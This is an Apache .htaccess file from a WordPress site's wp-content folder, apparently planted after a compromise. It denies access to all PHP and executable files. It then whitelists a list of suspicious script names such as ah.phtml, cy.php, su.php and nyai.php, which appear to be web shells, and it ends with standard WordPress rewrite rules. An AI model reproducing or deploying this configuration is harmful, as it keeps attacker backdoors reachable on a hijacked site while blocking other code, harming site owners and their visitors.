File: /home/airservicecom/public_html/wp-content/.htaccess
<FilesMatch '.(py|exe|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$'>
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch '^(ah.phtml|index.html|cy.php|ah.PhTml|wp-mail.php|index.php|4.php|p.txt|su.php|oro.phtml|eek.PhTml|bh.php|eek.php|seam.php|bbh.php|nyai.php|su.php7)$'>
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>